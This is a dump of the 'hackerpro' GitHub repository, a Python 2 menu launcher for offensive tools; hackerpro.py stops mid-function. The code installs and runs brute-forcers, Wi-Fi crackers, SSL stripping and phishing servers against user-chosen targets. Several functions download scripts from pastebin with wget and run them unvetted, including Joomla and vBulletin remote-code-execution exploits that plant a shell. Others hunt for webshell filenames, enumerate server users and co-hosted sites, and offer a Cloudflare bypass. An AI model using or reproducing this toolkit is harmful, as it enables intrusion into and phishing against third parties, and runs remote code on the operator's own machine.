Repository: technicaldada/hackerpro
Branch: master
Commit: 8f7735b7e10c
Files: 5
Total size: 60.4 KB
Directory structure:
gitextract_3716y01f/
├── LICENSE
├── README.md
├── hackerpro.py
├── install.sh
└── update.sh
================================================
FILE CONTENTS
================================================
================================================
FILE: LICENSE
================================================
MIT License
Copyright (c) 2018 Technical Dada
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
================================================
FILE: README.md
================================================
[](https://github.com/technicaldada/jaykali/issues)
[](https://github.com/jaykali/hackerpro/network)
[](https://github.com/jaykali/hackerpro/stargazers)
<p align="center">***Pentesing Tools That All Hacker Needs***</p>
<img src="logo205x250.gif" alt="hackerpro_logo" height="205" width="250">
## HACKERPRO Menu :
- Information Gathering
- Password Attacks
- Wireless Testing
- Exploitation Tools
- Sniffing & Spoofing
- Web Hacking
- Private Web Hacking
- Post Exploitation
- Install The HACKERPRO
### Information Gathering:
- Nmap
- Setoolkit
- Port Scanning
- Host To IP
- wordpress user
- CMS scanner
- XSStrike
- Dork - Google Dorks Passive Vulnerability Auditor
- Scan A server's Users
- Crips
### Password Attacks:
- Cupp
- Ncrack
### Wireless Testing:
- reaver
- pixiewps
- Fluxion
### Exploitation Tools:
- ATSCAN
- sqlmap
- Shellnoob
- commix
- FTP Auto Bypass
- jboss-autopwn
### Sniffing & Spoofing:
- Setoolkit
- SSLtrip
- pyPISHER
- SMTP Mailer
### Web Hacking:
- Drupal Hacking
- Inurlbr
- Wordpress & Joomla Scanner
- Gravity Form Scanner
- File Upload Checker
- Wordpress Exploit Scanner
- Wordpress Plugins Scanner
- Shell and Directory Finder
- Joomla! 1.5 - 3.4.5 remote code execution
- Vbulletin 5.X remote code execution
- BruteX - Automatically brute force all services running on a target
- Arachni - Web Application Security Scanner Framework
### Private Web Hacking:
- Get all websites
- Get joomla websites
- Get wordpress websites
- Control Panel Finder
- Zip Files Finder
- Upload File Finder
- Get server users
- SQli Scanner
- Ports Scan (range of ports)
- ports Scan (common ports)
- Get server Info
- Bypass Cloudflare
### Post Exploitation:
- Shell Checker
- POET
- Weeman
## Installation in Linux :
Open Terminal and Type : ```git clone https://github.com/jaykali/hackerpro.git```
After Downloading The File Type : ```sudo cd hackerpro && sudo python2 hackerpro.py```
Video Tutorial : Coming Soon
## Installation in Android :
1st Download [Termux](https://play.google.com/store/apps/details?id=com.termux)
</center>
Then Open Termux and Type : ```apt update && apt upgrade && apt install git && apt install python2```
After That Open Termux and Type : ```git clone https://github.com/jaykali/hackerpro.git```
Then Type : ```cd hackerpro && python2 hackerpro.py```
Video Tutorial : Coming Soon
## License :
[MIT Licence](https://github.com/jaykali/hackerpro/blob/master/LICENSE)
Thats It... If You Like This Repo. Please Share This With Your Friends..
& Don't Forget To Visit Our [Blog For Hackers](https://www.kalilinux.in) !!!
***Thankyou.***
***Keep Visiting..***
***Check our blog https://www.kalilinux.in***
***Enjoy.!!! :)***
<a href="https://www.kalilinux.in/" rel="dofollwo">Click Here</a>
================================================
FILE: hackerpro.py
================================================
#!/usr/bin/env python2.7
#
#
# _ _ _ _____
# | | | | | | | __ \
# | |__| | __ _ ___| | _____ _ __ | |__) | __ ___
# | __ |/ _` |/ __| |/ / _ \ '__| | ___/ '__/ _ \
# | | | | (_| | (__| < __/ | | | | | | (_) |
# |_| |_|\__,_|\___|_|\_\___|_| |_| |_| \___/
# Hacking Tools by-Technical Dada
import sys
import argparse
import os
import time
import httplib
import subprocess
import re
import urllib2
import socket
import urllib
import sys
import json
import telnetlib
import glob
import random
import Queue
import threading
#import requests
import base64
from getpass import getpass
from commands import *
from sys import argv
from platform import system
from urlparse import urlparse
from xml.dom import minidom
from optparse import OptionParser
from time import sleep
##########################
os.system('clear')
def menu():
print ("""
MIT License
Copyright (c) 2018 HACKERPRO
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.""")
os.system('clear')
os.system('clear')
os.system('clear')
os.system('clear')
directories = ['/uploads/', '/upload/', '/files/', '/resume/', '/resumes/', '/documents/', '/docs/', '/pictures/', '/file/', '/Upload/', '/Uploads/', '/Resume/', '/Resume/', '/UsersFiles/', '/Usersiles/', '/usersFiles/', '/Users_Files/', '/UploadedFiles/',
'/Uploaded_Files/', '/uploadedfiles/', '/uploadedFiles/', '/hpage/', '/admin/upload/', '/admin/uploads/', '/admin/resume/', '/admin/resumes/', '/admin/pictures/', '/pics/', '/photos/', '/Alumni_Photos/', '/alumni_photos/', '/AlumniPhotos/', '/users/']
shells = ['wso.php', 'shell.php', 'an.php', 'hacker.php', 'lol.php', 'up.php', 'cp.php', 'upload.php',
'sh.php', 'pk.php', 'mad.php', 'x00x.php', 'worm.php', '1337worm.php', 'config.php', 'x.php', 'haha.php']
upload = []
yes = set(['yes', 'y', 'ye', 'Y'])
no = set(['no', 'n'])
def logo():
print """
- Powered by
_______ _ _ _ _____ _
|__ __| | | (_) | | | __ \ | |
| | ___ ___| |__ _ __ _ ___ __ _| | | | | | __ _ __| | __ _
| |/ _ \/ __| '_ \| '_ \| |/ __/ _` | | | | | |/ _` |/ _` |/ _` |
| | __/ (__| | | | | | | | (_| (_| | | | |__| | (_| | (_| | (_| |
|_|\___|\___|_| |_|_| |_|_|\___\__,_|_| |_____/ \__,_|\__,_|\__,_|
"""
HACKERPROlogo = """\033[0m
_ _ _ _____
| | | | | | | __ \
| |__| | __ _ ___| | _____ _ __ | |__) | __ ___
| __ |/ _` |/ __| |/ / _ \ '__| | ___/ '__/ _ \
| | | | (_| | (__| < __/ | | | | | | (_) |
|_| |_|\__,_|\___|_|\_\___|_| |_| |_| \___/
~Tools For Hacking by by-Technical Dada
\033[91m"""
def menu():
print (HACKERPROlogo + """\033[1m
[!] This Tool Must Run As ROOT [!] https://github.com/technicaldada/hackerpro
\033[0m
{1}--Information Gathering
{2}--Password Attacks
{3}--Wireless Testing
{4}--Exploitation Tools
{5}--Sniffing & Spoofing
{6}--Web Hacking
{7}--Private Web Hacking
{8}--Post Exploitation
{0}--Install The HACKERPRO
{99}-Exit
""")
choice = raw_input("hackerpro~# ")
os.system('clear')
if choice == "1":
info()
elif choice == "2":
passwd()
elif choice == "3":
wire()
elif choice == "4":
exp()
elif choice == "5":
snif()
elif choice == "6":
webhack()
elif choice == "7":
dzz()
elif choice == "8":
postexp()
elif choice == "0":
updatehackerpro()
elif choice == "99":
clearScr(), sys.exit()
elif choice == "":
menu()
else:
menu()
def updatehackerpro():
print ("This Tool is Only Available for Linux and Similar Systems. ")
choiceupdate = raw_input("Continue Y / N: ")
if choiceupdate in yes:
os.system("git clone https://github.com/technicaldada/hackerpro.git")
os.system("cd hackerpro && sudo bash ./update.sh")
os.system("hackerpro")
def doork():
print("doork is a open-source passive vulnerability auditor tool that automates the process of searching on Google information about specific website based on dorks. ")
doorkchice = raw_input("Continue Y / N: ")
if doorkchice in yes:
os.system("pip install beautifulsoup4 && pip install requests")
os.system("git clone https://github.com/AeonDave/doork")
clearScr()
doorkt = raw_input("Target : ")
os.system("cd doork && python doork.py -t %s -o log.log" % doorkt)
def postexp():
clearScr()
print(HACKERPROlogo)
print(" {1}--Shell Checker")
print(" {2}--POET")
print(" {3}--Phishing Framework \n")
print(" {99}-Return to main menu \n\n ")
choice11 = raw_input("hackerpro~# ")
os.system('clear')
if choice11 == "1":
sitechecker()
if choice11 == "2":
poet()
if choice11 == "3":
weeman()
elif choice11 == "99":
menu()
def scanusers():
site = raw_input('Enter a website : ')
try:
users = site
if 'http://www.' in users:
users = users.replace('http://www.', '')
if 'http://' in users:
users = users.replace('http://', '')
if '.' in users:
users = users.replace('.', '')
if '-' in users:
users = users.replace('-', '')
if '/' in users:
users = users.replace('/', '')
while len(users) > 2:
print users
resp = urllib2.urlopen(
site + '/cgi-sys/guestbook.cgi?user=%s' % users).read()
if 'invalid username' not in resp.lower():
print "\tFound -> %s" % users
pass
users = users[:-1]
except:
pass
def brutex():
clearScr()
print("Automatically brute force all services running on a target : Open ports / DNS domains / Usernames / Passwords ")
os.system("git clone https://github.com/1N3/BruteX.git")
clearScr()
brutexchoice = raw_input("Select a Target : ")
os.system("cd BruteX && chmod 777 brutex && ./brutex %s" % brutexchoice)
def arachni():
print("Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications")
cara = raw_input("Install And Run ? Y / N : ")
clearScr()
print("exemple : http://www.target.com/")
tara = raw_input("Select a target to scan : ")
if cara in yes:
os.system("git clone git://github.com/Arachni/arachni.git")
os.system(
"cd arachni && sudo gem install bundler && bundle install --without prof && rake install")
os.system("archani")
clearScr()
os.system("cd arachni/bin && chmod 777 arachni && ./arachni %s" % tara)
def XSStrike():
clearScr()
print("XSStrike is a python script designed to detect and exploit XSS vulnerabilites. Follow The Owner On Github @UltimateHackers")
os.system("sudo rm -rf XSStrike")
os.system("git clone https://github.com/UltimateHackers/XSStrike.git && cd XSStrike && pip install -r requirements.txt && clear && python xsstrike")
def crips():
clearScr()
os.system("git clone https://github.com/Manisso/Crips.git")
os.system("cd Crips && sudo bash ./update.sh")
os.system("crips")
os.system("clear")
def weeman():
print("HTTP server for phishing in python. (and framework) Usually you will want to run Weeman with DNS spoof attack. (see dsniff, ettercap).")
choicewee = raw_input("Install Weeman ? Y / N : ")
if choicewee in yes:
os.system(
"git clone https://github.com/samyoyo/weeman.git && cd weeman && python weeman.py")
if choicewee in no:
menu()
else:
menu()
def gabriel():
print("Abusing authentication bypass of Open&Compact (Gabriel's)")
os.system("wget http://pastebin.com/raw/Szg20yUh --output-document=gabriel.py")
clearScr()
os.system("python gabriel.py")
ftpbypass = raw_input("Enter Target IP and Use Command :")
os.system("python gabriel.py %s" % ftpbypass)
def sitechecker():
os.system("wget http://pastebin.com/raw/Y0cqkjrj --output-document=ch01.py")
clearScr()
os.system("python ch01.py")
def h2ip():
host = raw_input("Select A Host : ")
ips = socket.gethostbyname(host)
print(ips)
def ports():
clearScr()
target = raw_input('Select a Target IP : ')
os.system("nmap -O -Pn %s" % target)
sys.exit()
def ifinurl():
print""" This Advanced search in search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found."""
print('Do You Want To Install InurlBR ? ')
cinurl = raw_input("Y/N: ")
if cinurl in yes:
inurl()
if cinurl in no:
menu()
elif cinurl == "":
menu()
else:
menu()
def bsqlbf():
clearScr()
print("This tool will only work on blind sql injection")
cbsq = raw_input("select target : ")
os.system("wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/bsqlbf-v2/bsqlbf-v2-7.pl -o bsqlbf.pl")
os.system("perl bsqlbf.pl -url %s" % cbsq)
os.system("rm bsqlbf.pl")
def atscan():
print ("Do You To Install ATSCAN ?")
choiceshell = raw_input("Y/N: ")
if choiceshell in yes:
os.system("sudo rm -rf ATSCAN")
os.system(
"git clone https://github.com/AlisamTechnology/ATSCAN.git && cd ATSCAN && perl atscan.pl")
elif choiceshell in no:
os.system('clear')
menu()
def commix():
print ("Automated All-in-One OS Command Injection and Exploitation Tool.")
print ("usage : python commix.py --help")
choicecmx = raw_input("Continue: y/n :")
if choicecmx in yes:
os.system("git clone https://github.com/stasinopoulos/commix.git commix")
os.system("cd commix")
os.system("python commix.py")
os.system("")
elif choicecmx in no:
os.system('clear')
info()
def pixiewps():
print"""Pixiewps is a tool written in C used to bruteforce offline the WPS pin exploiting the low or non-existing entropy of some Access Points, the so-called "pixie dust attack" discovered by Dominique Bongard in summer 2014. It is meant for educational purposes only
"""
choicewps = raw_input("Continue ? Y/N : ")
if choicewps in yes:
os.system("git clone https://github.com/wiire/pixiewps.git")
os.system("cd pixiewps & make ")
os.system("sudo make install")
if choicewps in no:
menu()
elif choicewps == "":
menu()
else:
menu()
def webhack():
print(HACKERPROlogo)
print(" {1}--Drupal Hacking ")
print(" {2}--Inurlbr")
print(" {3}--Wordpress & Joomla Scanner")
print(" {4}--Gravity Form Scanner")
print(" {5}--File Upload Checker")
print(" {6}--Wordpress Exploit Scanner")
print(" {7}--Wordpress Plugins Scanner")
print(" {8}--Shell and Directory Finder")
print(" {9}--Joomla! 1.5 - 3.4.5 remote code execution")
print(" {10}-Vbulletin 5.X remote code execution")
print(
" {11}-BruteX - Automatically brute force all services running on a target")
print(" {12}-Arachni - Web Application Security Scanner Framework \n ")
print(" {99}-Back To Main Menu \n")
choiceweb = raw_input("hackerpro~# ")
if choiceweb == "1":
clearScr()
maine()
if choiceweb == "2":
clearScr()
ifinurl()
if choiceweb == '3':
clearScr()
wppjmla()
if choiceweb == "4":
clearScr()
gravity()
if choiceweb == "5":
clearScr()
sqlscan()
if choiceweb == "6":
clearScr()
wpminiscanner()
if choiceweb == "7":
clearScr()
wppluginscan()
if choiceweb == "8":
clearScr()
shelltarget()
if choiceweb == "9":
clearScr()
joomlarce()
if choiceweb == "10":
clearScr()
vbulletinrce()
if choiceweb == "11":
clearScr()
brutex()
if choiceweb == "12":
clearScr()
arachni()
elif choiceweb == "99":
menu()
elif choiceweb == "":
menu()
else:
menu()
def vbulletinrce():
os.system("wget http://pastebin.com/raw/eRSkgnZk --output-document=tmp.pl")
os.system("perl tmp.pl")
def joomlarce():
os.system("wget http://pastebin.com/raw/EX7Gcbxk --output-document=temp.py")
clearScr()
print("if the response is 200 , you will find your shell in Joomla_3.5_Shell.txt")
jmtarget = raw_input("Select a targets list :")
os.system("python temp.py %s" % jmtarget)
def inurl():
dork = raw_input("select a Dork:")
output = raw_input("select a file to save :")
os.system(
"./inurlbr.php --dork '{0}' -s {1}.txt -q 1,6 -t 1".format(dork, output))
if cinurl in no:
insinurl()
elif cinurl == "":
menu()
else:
menu()
def insinurl():
os.system("git clone https://github.com/googleinurl/SCANNER-INURLBR.git")
os.system("chmod +x SCANNER-INURLBR/inurlbr.php")
os.system("apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl")
os.system("mv /SCANNER-INURLBR/inurbr.php inurlbr.php")
clearScr()
inurl()
def nmap():
choice7 = raw_input("continue ? Y / N : ")
if choice7 in yes:
os.system("git clone https://github.com/nmap/nmap.git")
os.system("cd nmap && ./configure && make && make install")
elif choice7 in no:
info()
elif choice7 == "":
menu()
else:
menu()
def jboss():
os.system('clear')
print ("This JBoss script deploys a JSP shell on the target JBoss AS server. Once")
print ("deployed, the script uses its upload and command execution capability to")
print ("provide an interactive session.")
print ("")
print ("usage : ./e.sh target_ip tcp_port ")
print("Continue: y/n")
choice9 = raw_input("yes / no :")
if choice9 in yes:
os.system(
"git clone https://github.com/SpiderLabs/jboss-autopwn.git"), sys.exit()
elif choice9 in no:
os.system('clear')
exp()
elif choice9 == "":
menu()
else:
menu()
def wppluginscan():
Notfound = [404, 401, 400, 403, 406, 301]
sitesfile = raw_input("sites file : ")
filepath = raw_input("Plugins File : ")
def scan(site, dir):
global resp
try:
conn = httplib.HTTPConnection(site)
conn.request('HEAD', "/wp-content/plugins/" + dir)
resp = conn.getresponse().status
except(), message:
print "Cant Connect :", message
pass
def timer():
now = time.localtime(time.time())
return time.asctime(now)
def main():
sites = open(sitesfile).readlines()
plugins = open(filepath).readlines()
for site in sites:
site = site.rstrip()
for plugin in plugins:
plugin = plugin.rstrip()
scan(site, plugin)
if resp not in Notfound:
print "+----------------------------------------+"
print "| current site :" + site
print "| Found Plugin : " + plugin
print "| Result:", resp
def sqlmap():
print ("usage : python sqlmap.py -h")
choice8 = raw_input("Continue: y/n :")
if choice8 in yes:
os.system(
"git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev & ")
elif choice8 in no:
os.system('clear')
info()
elif choice8 == "":
menu()
else:
menu()
def grabuploadedlink(url):
try:
for dir in directories:
currentcode = urllib.urlopen(url + dir).getcode()
if currentcode == 200 or currentcode == 403:
print "-------------------------"
print " [ + ] Found Directory : " + str(url + dir) + " [ + ]"
print "-------------------------"
upload.append(url + dir)
except:
pass
def grabshell(url):
try:
for upl in upload:
for shell in shells:
currentcode = urllib.urlopen(upl + shell).getcode()
if currentcode == 200:
print "-------------------------"
print " [ ! ] Found Shell : " + str(upl + shell) + " [ ! ]"
print "-------------------------"
except:
pass
def shelltarget():
print("exemple : http://target.com")
line = raw_input("target : ")
line = line.rstrip()
grabuploadedlink(line)
grabshell(line)
def poet():
print("POET is a simple POst-Exploitation Tool.")
print("")
choicepoet = raw_input("y / n :")
if choicepoet in yes:
os.system("git clone https://github.com/mossberg/poet.git")
os.system("python poet/server.py")
if choicepoet in no:
clearScr()
postexp()
elif choicepoet == "":
menu()
else:
menu()
def setoolkit():
print ("The Social-Engineer Toolkit is an open-source penetration testing framework")
print(") designed for social engineering. SET has a number of custom attack vectors that ")
print(" allow you to make a believable attack quickly. SET is a product of TrustedSec, LLC ")
print("an information security consulting firm located in Cleveland, Ohio.")
print("")
choiceset = raw_input("y / n :")
if choiceset in yes:
os.system(
"git clone https://github.com/trustedsec/social-engineer-toolkit.git")
os.system("python social-engineer-toolkit/setup.py")
if choiceset in no:
clearScr()
info()
elif choiceset == "":
menu()
else:
menu()
def cupp():
print("cupp is a password list generator ")
print("Usage: python cupp.py -h")
choicecupp = raw_input("Continue: y/n : ")
if choicecupp in yes:
os.system("git clone https://github.com/Mebus/cupp.git")
print("file downloaded successfully")
elif choicecupp in no:
clearScr()
passwd()
elif choicecupp == "":
menu()
else:
menu()
def ncrack():
print("A Ruby interface to Ncrack, Network authentication cracking tool.")
print("requires : nmap >= 0.3ALPHA / rprogram ~> 0.3")
print("Continue: y/n")
choicencrack = raw_input("y / n :")
if choicencrack in yes:
os.system("git clone https://github.com/sophsec/ruby-ncrack.git")
os.system("cd ruby-ncrack")
os.system("install ruby-ncrack")
elif choicencrack in no:
clearScr()
passwd()
elif choicencrack == "":
menu()
else:
menu()
def reaver():
print """
Reaver has been designed to be a robust and practical attack against Wi-Fi Protected Setup
WPS registrar PINs in order to recover WPA/WPA2 passphrases. It has been tested against a
wide variety of access points and WPS implementations
1 to accept / 0 to decline
"""
creaver = raw_input("y / n :")
if creaver in yes:
os.system(
"apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng pixiewps")
os.system("git clone https://github.com/t6x/reaver-wps-fork-t6x.git")
os.system("cd reaver-wps-fork-t6x/src/ & ./configure")
os.system("cd reaver-wps-fork-t6x/src/ & make")
elif creaver in no:
clearScr()
wire()
elif creaver == "":
menu()
else:
menu()
def ssls():
print"""sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping
attacks.
It requires Python 2.5 or newer, along with the 'twisted' python module."""
cssl = raw_input("y / n :")
if cssl in yes:
os.system("git clone https://github.com/moxie0/sslstrip.git")
os.system("sudo apt-get install python-twisted-web")
os.system("python sslstrip/setup.py")
if cssl in no:
snif()
elif cssl == "":
menu()
else:
menu()
def unique(seq):
seen = set()
return [seen.add(x) or x for x in seq if x not in seen]
def bing_all_grabber(s):
lista = []
page = 1
while page <= 101:
try:
bing = "http://www.bing.com/search?q=ip%3A" + \
s + "+&count=50&first=" + str(page)
openbing = urllib2.urlopen(bing)
readbing = openbing.read()
findwebs = re.findall('<h2><a href="(.*?)"', readbing)
for i in range(len(findwebs)):
allnoclean = findwebs[i]
findall1 = re.findall('http://(.*?)/', allnoclean)
for idx, item in enumerate(findall1):
if 'www' not in item:
findall1[idx] = 'http://www.' + item + '/'
else:
findall1[idx] = 'http://' + item + '/'
lista.extend(findall1)
page += 50
except urllib2.URLError:
pass
final = unique(lista)
return final
def check_gravityforms(sites):
import urllib
gravityforms = []
for site in sites:
try:
if urllib.urlopen(site + 'wp-content/plugins/gravityforms/gravityforms.php').getcode() == 403:
gravityforms.append(site)
except:
pass
return gravityforms
def gravity():
ip = raw_input('Enter IP : ')
sites = bing_all_grabber(str(ip))
gravityforms = check_gravityforms(sites)
for ss in gravityforms:
print ss
print '\n'
print '[*] Found, ', len(gravityforms), ' gravityforms.'
def shellnoob():
print """Writing shellcodes has always been super fun, but some parts are extremely boring and error prone. Focus only on the fun part, and use ShellNoob!"""
cshell = raw_input("Y / N : ")
if cshell in yes:
os.system("git clone https://github.com/reyammer/shellnoob.git")
os.system("mv shellnoob/shellnoob.py shellnoob.py")
os.system("sudo python shellnoob.py --install")
if cshell in no:
exp()
elif cshell == "":
menu()
else:
menu()
def info():
print(HACKERPROlogo)
print(" {1}--Nmap ")
print(" {2}--Setoolkit")
print(" {3}--Port Scanning")
print(" {4}--Host To IP")
print(" {5}--wordpress user")
print(" {6}--CMS scanner")
print(" {7}--XSStrike")
print(" {8}--Dork - Google Dorks Passive Vulnerability Auditor ")
print(" {9}--Scan A server's Users ")
print(" {10}-Crips\n ")
print(" {99}-Back To Main Menu \n\n")
choice2 = raw_input("hackerpro~# ")
if choice2 == "1":
os.system('clear')
nmap()
if choice2 == "2":
clearScr()
setoolkit()
if choice2 == "3":
clearScr()
ports()
if choice2 == "4":
clearScr()
h2ip()
if choice2 == "5":
clearScr()
wpue()
if choice2 == "6":
clearScr()
cmsscan()
if choice2 == "7":
clearScr()
XSStrike()
if choice2 == "8":
clearScr()
doork()
if choice2 == "10":
clearScr()
crips()
elif choice2 == "99":
clearScr()
menu()
if choice2 == "9":
clearScr()
scanusers()
elif choice2 == "":
menu()
else:
menu()
def cmsscan():
os.system("git clone https://github.com/Dionach/CMSmap.git")
clearScr()
xz = raw_input("select target : ")
os.system("cd CMSmap @@ sudo cmsmap.py %s" % xz)
def wpue():
os.system("git clone https://github.com/wpscanteam/wpscan.git")
clearScr()
xe = raw_input("Select a Wordpress target : ")
os.system("cd wpscan && sudo ruby wpscan.rb --url %s --enumerate u" % xe)
def priv8():
dzz()
def androidhash():
key = raw_input("Enter the android hash : ")
salt = raw_input("Enter the android salt : ")
os.system("git clone https://github.com/PentesterES/AndroidPINCrack.git")
os.system(
"cd AndroidPINCrack && python AndroidPINCrack.py -H %s -s %s" % (key, salt))
def passwd():
print(HACKERPROlogo)
print(" {1}--Cupp ")
print(" {2}--Ncrack \n ")
print(" {99}-Back To Main Menu \n")
choice3 = raw_input("hackerpro~# ")
if choice3 == "1":
clearScr()
cupp()
elif choice3 == "2":
clearScr()
ncrack()
elif choice3 == "99":
clearScr()
menu()
elif choice3 == "":
menu()
elif choice3 == "3":
fb()
else:
menu()
def bluepot():
print("you need to have at least 1 bluetooh receiver (if you have many it will work wiht those, too). You must install / libbluetooth-dev on Ubuntu / bluez-libs-devel on Fedora/bluez-devel on openSUSE ")
choice = raw_input("Continue ? Y / N : ")
if choice in yes:
os.system("wget https://github.com/andrewmichaelsmith/bluepot/raw/master/bin/bluepot-0.1.tar.gz && tar xfz bluepot-0.1.tar.gz && sudo java -jar bluepot/BluePot-0.1.jar")
else:
menu()
def fluxion():
print("fluxion is a wifi key cracker using evil twin attack..you need a wireless adoptor for this tool.")
choice = raw_input("Continue ? Y / N : ")
if choice in yes:
os.system("git clone https://github.com/thehackingsage/Fluxion.git")
os.system("cd Fluxion && cd install && sudo chmod +x install.sh && sudo ./install.sh")
os.system("cd .. && sudo chmod +x fluxion.sh && sudo ./fluxion.sh")
elif choice in no:
clearScr()
wire()
else:
menu()
def wire():
print(HACKERPROlogo)
print(" {1}--reaver ")
print(" {2}--pixiewps")
print(" {3}--Bluetooth Honeypot GUI Framework")
print(" {4}--Fluxion\n")
print(" {99}-Back To The Main Menu \n\n")
choice4 = raw_input("hackerpro~# ")
if choice4 == "1":
clearScr()
reaver()
if choice4 == "2":
clearScr()
pixiewps()
if choice4 == "3":
bluepot()
if choice4 == "4":
fluxion()
elif choice4 == "99":
menu()
elif choice4 == "":
menu()
else:
menu()
def exp():
print(HACKERPROlogo)
print(" {1}--ATSCAN")
print(" {2}--sqlmap")
print(" {3}--Shellnoob")
print(" {4}--commix")
print(" {5}--FTP Auto Bypass")
print(" {6}--jboss-autopwn")
print(" {7}--Blind SQL Automatic Injection And Exploit")
print(" {8}--Bruteforce the Android Passcode given the hash and salt")
print(" {9}--Joomla SQL injection Scanner \n ")
print(" {99}-Go Back To Main Menu \n\n")
choice5 = raw_input("hackerpro~# ")
if choice5 == "2":
clearScr()
sqlmap()
if choice5 == "1":
os.system('clear')
atscan()
if choice5 == "3":
clearScr()
shellnoob()
if choice5 == "4":
os.system("clear")
commix()
if choice5 == "5":
clearScr()
gabriel()
if choice5 == "6":
clearScr()
jboss()
if choice5 == "7":
clearScr()
bsqlbf()
if choice5 == "8":
androidhash()
if choice5 == "9":
cmsfew()
elif choice5 == "99":
menu()
elif choice5 == "":
menu()
else:
menu()
def snif():
print(HACKERPROlogo)
print(" {1}--Setoolkit ")
print(" {2}--SSLtrip")
print(" {3}--pyPISHER")
print(" {4}--SMTP Mailer \n ")
print(" {99}-Back To Main Menu \n\n")
choice6 = raw_input("hackerpro~# ")
if choice6 == "1":
clearScr()
setoolkit()
if choice6 == "2":
clearScr()
ssls()
if choice6 == "3":
clearScr()
pisher()
if choice6 == "4":
clearScr()
smtpsend()
if choice6 == "99":
clearScr()
menu()
elif choice6 == "":
menu()
else:
menu()
def cmsfew():
print("your target must be Joomla, Mambo, PHP-Nuke, and XOOPS Only ")
target = raw_input("Select a target : ")
os.system(
"wget https://dl.packetstormsecurity.net/UNIX/scanners/cms_few.py.txt -O cms.py")
os.system("python cms.py %s" % target)
def smtpsend():
os.system("wget http://pastebin.com/raw/Nz1GzWDS --output-document=smtp.py")
clearScr()
os.system("python smtp.py")
def pisher():
os.system("wget http://pastebin.com/raw/DDVqWp4Z --output-document=pisher.py")
clearScr()
os.system("python pisher.py")
menuu = HACKERPROlogo + """
{1}--Get all websites
{2}--Get joomla websites
{3}--Get wordpress websites
{4}--Control Panel Finder
{5}--Zip Files Finder
{6}--Upload File Finder
{7}--Get server users
{8}--SQli Scanner
{9}--Ports Scan (range of ports)
{10}-ports Scan (common ports)
{11}-Get server Info
{12}-Bypass Cloudflare
{99}-Back To Main Menu
"""
def unique(seq):
"""
get unique from list found it on stackoverflow
"""
seen = set()
return [seen.add(x) or x for x in seq if x not in seen]
def clearScr():
"""
clear the screen in case of GNU/Linux or
windows
"""
if system() == 'Linux':
os.system('clear')
if system() == 'Windows':
os.system('cls')
class Fscan:
def __init__(self, serverip):
self.serverip = serverip
self.getSites(False)
print menuu
while True:
choice = raw_input('hackerpro~# ')
if choice == '1':
self.getSites(True)
elif choice == '2':
self.getJoomla()
elif choice == '3':
self.getWordpress()
elif choice == '4':
self.findPanels()
elif choice == '5':
self.findZip()
elif choice == '6':
self.findUp()
elif choice == '7':
self.getUsers()
elif choice == '8':
self.grabSqli()
elif choice == '9':
ran = raw_input(' Enter range of ports, (ex : 1-1000) -> ')
self.portScanner(1, ran)
elif choice == '10':
self.portScanner(2, None)
elif choice == '11':
self.getServerBanner()
elif choice == '12':
self.cloudflareBypasser()
elif choice == '99':
menu()
con = raw_input(' Continue [Y/n] -> ')
if con[0].upper() == 'N':
exit()
else:
clearScr()
print menuu
def getSites(self, a):
"""
get all websites on same server
from bing search
"""
lista = []
page = 1
while page <= 101:
try:
bing = "http://www.bing.com/search?q=ip%3A" + \
self.serverip + "+&count=50&first=" + str(page)
openbing = urllib2.urlopen(bing)
readbing = openbing.read()
findwebs = re.findall('<h2><a href="(.*?)"', readbing)
for i in range(len(findwebs)):
allnoclean = findwebs[i]
findall1 = re.findall('http://(.*?)/', allnoclean)
for idx, item in enumerate(findall1):
if 'www' not in item:
findall1[idx] = 'http://www.' + item + '/'
else:
findall1[idx] = 'http://' + item + '/'
lista.extend(findall1)
page += 50
except urllib2.URLError:
pass
self.sites = unique(lista)
if a:
clearScr()
print '[*] Found ', len(lista), ' Website\n'
for site in self.sites:
print site
def getWordpress(self):
"""
get wordpress site using a dork the attacker
may do a password list attack (i did a tool for that purpose check my pastebin)
or scan for common vulnerabilities using wpscan for example (i did a simple tool
for multi scanning using wpscan)
"""
lista = []
page = 1
while page <= 101:
try:
bing = "http://www.bing.com/search?q=ip%3A" + \
self.serverip + "+?page_id=&count=50&first=" + str(page)
openbing = urllib2.urlopen(bing)
readbing = openbing.read()
